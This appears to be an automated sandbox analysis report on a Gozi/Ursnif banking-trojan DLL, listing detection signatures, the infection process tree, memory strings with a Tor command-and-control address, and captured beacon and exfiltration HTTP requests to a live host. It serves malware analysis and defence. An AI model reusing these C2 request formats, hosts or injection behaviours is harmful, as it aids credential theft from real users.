Loading ...

Play interactive tourEdit tour

Analysis Report o0AX0nKiUn.dll

Overview

General Information

Sample Name:o0AX0nKiUn.dll
Analysis ID:391256
MD5:a3aa691bc97faf6f17eec0841b5ff730
SHA1:9a642c22ebc19f4f8063b5ae986843916309b95a
SHA256:eb639e9d45ed4d4cf911195b7ef53d61897dd8f826c542ae411854ddec3aea87
Tags:dllGoziISFBUrsnif
Infos:

Most interesting Screenshot:

Detection

Gozi Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Gozi e-Banking trojan
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
May check the online IP address of the machine
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes to foreign memory regions
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5920 cmdline: loaddll32.exe 'C:\Users\user\Desktop\o0AX0nKiUn.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 640 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\o0AX0nKiUn.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5984 cmdline: rundll32.exe 'C:\Users\user\Desktop\o0AX0nKiUn.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 7096 cmdline: C:\Windows\system32\control.exe /? MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 1940 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /? MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5980 cmdline: rundll32.exe C:\Users\user\Desktop\o0AX0nKiUn.dll,Lengthwhether MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • nslookup.exe (PID: 5232 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
    • control.exe (PID: 7116 cmdline: C:\Windows\system32\control.exe /? MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6076 cmdline: 'C:\Windows\system32\rundll32.exe' 'C:\Users\user\AppData\Roaming\Microsoft\AppXtcse\AJRovrcp.dll',DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
          • rundll32.exe (PID: 5904 cmdline: 'C:\Windows\system32\rundll32.exe' 'C:\Users\user\AppData\Roaming\Microsoft\AppXtcse\AJRovrcp.dll',DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 3880 cmdline: 'C:\Windows\system32\rundll32.exe' 'C:\Users\user\AppData\Roaming\Microsoft\AppXtcse\AJRovrcp.dll',DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
          • rundll32.exe (PID: 6176 cmdline: 'C:\Windows\system32\rundll32.exe' 'C:\Users\user\AppData\Roaming\Microsoft\AppXtcse\AJRovrcp.dll',DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • cmd.exe (PID: 5980 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\94BA.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • cmd.exe (PID: 5244 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\94BA.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5208 cmdline: 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 6156 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /? MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      0000001A.00000002.486145705.000000000092D000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 44 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: o0AX0nKiUn.dllAvira: detected
            Multi AV Scanner detection for domain / URLShow sources
            Source: shoshanna.atVirustotal: Detection: 8%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: o0AX0nKiUn.dllVirustotal: Detection: 61%Perma Link
            Source: o0AX0nKiUn.dllMetadefender: Detection: 44%Perma Link
            Source: o0AX0nKiUn.dllReversingLabs: Detection: 62%
            Machine Learning detection for sampleShow sources
            Source: o0AX0nKiUn.dllJoe Sandbox ML: detected
            Source: o0AX0nKiUn.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: o0AX0nKiUn.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: c:\Opposite\Build\Colony\fight\Book\appear\ruleEquate.pdb source: loaddll32.exe, 00000000.00000002.319282240.0000000003990000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.323593002.000000006D4F4000.00000002.00020000.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.349563208.000000000EC20000.00000002.00000001.sdmp
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.313886587.0000000003EE0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.307192295.0000000005640000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: explorer.exe, 0000000F.00000003.404431790.00000000072C0000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.313886587.0000000003EE0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.307192295.0000000005640000.00000004.00000001.sdmp
            Source: Binary string: rundll32.pdb source: control.exe, 0000000D.00000002.329142996.000002ADA921C000.00000004.00000040.sdmp, control.exe, 0000000E.00000002.379228642.000001A4D17FC000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb source: explorer.exe, 0000000F.00000003.404431790.00000000072C0000.00000004.00000001.sdmp
            Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000000D.00000002.329142996.000002ADA921C000.00000004.00000040.sdmp, control.exe, 0000000E.00000002.379228642.000001A4D17FC000.00000004.00000040.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.349563208.000000000EC20000.00000002.00000001.sdmp
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03172FE4 CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,KiUserExceptionDispatcher,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_03172FE4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_0092429A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,26_2_0092429A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_0091DABA memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,26_2_0091DABA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_00914D8B FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,26_2_00914D8B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_02CD2FE4 CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,KiUserExceptionDispatcher,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,26_2_02CD2FE4

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.5:49718 -> 87.106.18.141:80
            Source: TrafficSnort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.2.5:49718 -> 87.106.18.141:80
            Source: TrafficSnort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.5:49728 -> 87.106.18.141:80
            Found Tor onion addressShow sources
            Source: control.exe, 0000000D.00000003.325391949.000002ADA921C000.00000004.00000040.sdmpString found in binary or memory: http://ey7kuuklgieop2pq.onion
            Source: control.exe, 0000000D.00000002.327809364.00000000002AE000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: control.exe, 0000000E.00000003.374902025.000001A4D17FC000.00000004.00000040.sdmpString found in binary or memory: http://ey7kuuklgieop2pq.onion
            Source: control.exe, 0000000E.00000002.377395710.00000000007DE000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: explorer.exe, 0000000F.00000003.485504696.0000000004F50000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: explorer.exe, 0000000F.00000000.354159270.00000000100DC000.00000004.00000040.sdmpString found in binary or memory: http://ey7kuuklgieop2pq.onion
            Source: RuntimeBroker.exe, 00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000010.00000003.501796313.000002413C902000.00000004.00000001.sdmpString found in binary or memory: http://ey7kuuklgieop2pq.onion
            Source: rundll32.exe, 00000011.00000002.328442434.000001EA0414E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: rundll32.exe, 00000011.00000002.328620335.000001EA0462C000.00000004.00000040.sdmpString found in binary or memory: http://ey7kuuklgieop2pq.onion
            Source: RuntimeBroker.exe, 00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000012.00000003.501797062.000001E766A02000.00000004.00000001.sdmpString found in binary or memory: http://ey7kuuklgieop2pq.onion
            Source: RuntimeBroker.exe, 00000013.00000003.491218857.00000209AC190000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000013.00000003.501847968.00000209ABB13000.00000004.00000001.sdmpString found in binary or memory: http://ey7kuuklgieop2pq.onion
            Source: RuntimeBroker.exe, 00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000015.00000003.501797398.000001598A202000.00000004.00000001.sdmpString found in binary or memory: http://ey7kuuklgieop2pq.onion
            Source: RuntimeBroker.exe, 00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000016.00000002.527754850.000001F9FFC02000.00000004.00000001.sdmpString found in binary or memory: http://ey7kuuklgieop2pq.onion
            May check the online IP address of the machineShow sources
            Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
            Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
            Source: unknownDNS query: name: myip.opendns.com
            Source: unknownDNS query: name: myip.opendns.com
            Source: unknownDNS query: name: myip.opendns.com
            Source: unknownDNS query: name: myip.opendns.com
            Source: unknownDNS query: name: myip.opendns.com
            Source: unknownDNS query: name: myip.opendns.com
            Uses nslookup.exe to query domainsShow sources
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: global trafficHTTP traffic detected: GET /images/agV_2BJF/gSHK7ixStYF72l8_2FB1iPk/NvJZbLqYhu/t0azbR_2FROp4xsEy/o1nQLJSnasHZ/kp7U5IED04L/D_2FED8TALa0Kx/eIDtBVCufsDQl2pGmyB4y/gSoVJjJAAjo_2BJ9/b8U1_2FzQrurByk/eSr_2Bot_2FEn_2FYg/lBo3_2Ff3/W7T322qSijmun2M4pfgd/g_2BOEUdchz/vjxSoRoj/8.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: shoshanna.at
            Source: global trafficHTTP traffic detected: POST /images/LJhn_2FB/_2BnW2YL3WT91OGEGrtontJ/tz26Ur16DO/Vb0fBvZMsYvl_2Ftu/hAIP2LXP9LpY/UxM1U2HyuE6/YjMWiIJ5hAHZr3/VX3S5GavgY0_2BoqFMO3c/kFSjrTDl92m3RG1t/2cQc5CJ1OGgDG5_/2BEmvyPeJqBWghHZ47/QHN7OVQJT/UOEF94X1N7KlQ62WDDer/L0w3gbwf5qg9Ac_2FDW/sra5_2BS3fbC4O/7.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=151135526142640864142783612034User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Content-Length: 387Host: shoshanna.at
            Source: global trafficHTTP traffic detected: GET /images/_2B8Z4ErblIEiDRe/kC_2Figz0SkbjHn/6jOzX3EKuL3lyOL1cD/BTKPgmIPC/XYwl4ZuHIILA2iobV6s1/J2zvfGVKkMO_2BIQ5Tm/IKt9b_2FJVgi_2FemqL5IS/Il9oN2Z5T3VSZ/uuw6K5sG/uaSFUVW8DD_2Bv5oPdSE4fb/lstSPlNyBE/NtRDiWqIykivR1G7A/Rzxtn_2Fw4e2ct/_2FO.jpeg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: shoshanna.at
            Source: global trafficHTTP traffic detected: GET /images/2Y_2F6RzB9/IbmiwY5aHYYvOqaOS/K5jZbXosbSeK/EdsgE0YTjaN/bMXl9lrCtAHhd_/2B0u2oPHkq2ae72B_2Fb8/tf3HJkLJ_2F_2FBz/vZezlkFNpWzlI3R/de9t_2BxcR5u7AlPIB/esxImpzFI/SCLrc3wC4Pp8PYZIgsa_/2FLnetk_2FDmxoPLqhf/y_2BTzMwYgQdh_2B8_2Bms/1Y6MeWiew/k.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: shoshanna.at
            Source: global trafficHTTP traffic detected: GET /images/Q7tPDHfXFlLYER/m6P1Iz7KW_2FIoT1WcTWi/FTUOZxr_2FYDCWQ1/jIDRTnKsfiNxUgM/nJuFzAQ8d2pYQg05Pn/X12EAaDLD/mTuYkOz3BbsiTnFaxfyZ/LUI8TqHYo05DZ7d9krs/Maj_2BCyUcD6fWwR0KVtli/_2F2zeHf21tl2/wgj2WFvg/q8vK3Hk8lj0AGiPlPkat_2B/UiJu.jpeg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: shoshanna.at
            Source: global trafficHTTP traffic detected: GET /images/kvps_2BpTgbf2SnTu2ZwR29/J34HpNqIBq/YSB6ROND_2BfMiTtl/Mhu1aHVV6HlY/dKQ3IwmpGFj/76CuzoKlWX9PpM/9kr5gxTUHM4QcQe8bYo9p/_2FmB_2BGl_2Blf5/X_2Bk1py4xQSlsg/PFFhccF0W0UpbdOWLt/h78tKO8Ii/Ir64qCjSYvs90HHyBekU/xeBDaBaiMr3/av6sAJ4.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: shoshanna.at
            Source: global trafficHTTP traffic detected: GET /images/agV_2BJF/gSHK7ixStYF72l8_2FB1iPk/NvJZbLqYhu/t0azbR_2FROp4xsEy/o1nQLJSnasHZ/kp7U5IED04L/D_2FED8TALa0Kx/eIDtBVCufsDQl2pGmyB4y/gSoVJjJAAjo_2BJ9/b8U1_2FzQrurByk/eSr_2Bot_2FEn_2FYg/lBo3_2Ff3/W7T322qSijmun2M4pfgd/g_2BOEUdchz/vjxSoRoj/8.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: shoshanna.at
            Source: global trafficHTTP traffic detected: GET /images/_2B8Z4ErblIEiDRe/kC_2Figz0SkbjHn/6jOzX3EKuL3lyOL1cD/BTKPgmIPC/XYwl4ZuHIILA2iobV6s1/J2zvfGVKkMO_2BIQ5Tm/IKt9b_2FJVgi_2FemqL5IS/Il9oN2Z5T3VSZ/uuw6K5sG/uaSFUVW8DD_2Bv5oPdSE4fb/lstSPlNyBE/NtRDiWqIykivR1G7A/Rzxtn_2Fw4e2ct/_2FO.jpeg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: shoshanna.at
            Source: global trafficHTTP traffic detected: GET /images/2Y_2F6RzB9/IbmiwY5aHYYvOqaOS/K5jZbXosbSeK/EdsgE0YTjaN/bMXl9lrCtAHhd_/2B0u2oPHkq2ae72B_2Fb8/tf3HJkLJ_2F_2FBz/vZezlkFNpWzlI3R/de9t_2BxcR5u7AlPIB/esxImpzFI/SCLrc3wC4Pp8PYZIgsa_/2FLnetk_2FDmxoPLqhf/y_2BTzMwYgQdh_2B8_2Bms/1Y6MeWiew/k.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: shoshanna.at
            Source: global trafficHTTP traffic detected: GET /images/Q7tPDHfXFlLYER/m6P1Iz7KW_2FIoT1WcTWi/FTUOZxr_2FYDCWQ1/jIDRTnKsfiNxUgM/nJuFzAQ8d2pYQg05Pn/X12EAaDLD/mTuYkOz3BbsiTnFaxfyZ/LUI8TqHYo05DZ7d9krs/Maj_2BCyUcD6fWwR0KVtli/_2F2zeHf21tl2/wgj2WFvg/q8vK3Hk8lj0AGiPlPkat_2B/UiJu.jpeg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: shoshanna.at
            Source: global trafficHTTP traffic detected: GET /images/kvps_2BpTgbf2SnTu2ZwR29/J34HpNqIBq/YSB6ROND_2BfMiTtl/Mhu1aHVV6HlY/dKQ3IwmpGFj/76CuzoKlWX9PpM/9kr5gxTUHM4QcQe8bYo9p/_2FmB_2BGl_2Blf5/X_2Bk1py4xQSlsg/PFFhccF0W0UpbdOWLt/h78tKO8Ii/Ir64qCjSYvs90HHyBekU/xeBDaBaiMr3/av6sAJ4.gif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: shoshanna.at
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='L6sPr4/QT7XqqcGwXyFtNw=='>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.de/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Suche</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="http://www.google.de/imghp?hl=de&tab=wi"><span class=gbtb2></span><span class=gbts>Bilder</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="http://maps.google.de/maps?hl=de&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=de&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="http://www.youtube.com/?gl=DE&tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.de/intl/de/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>Mehr</span><span class=gbma></span></span></a><script nonce='L6sPr4/QT7XqqcGwXyFtNw=='>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Kalender</a></li><li 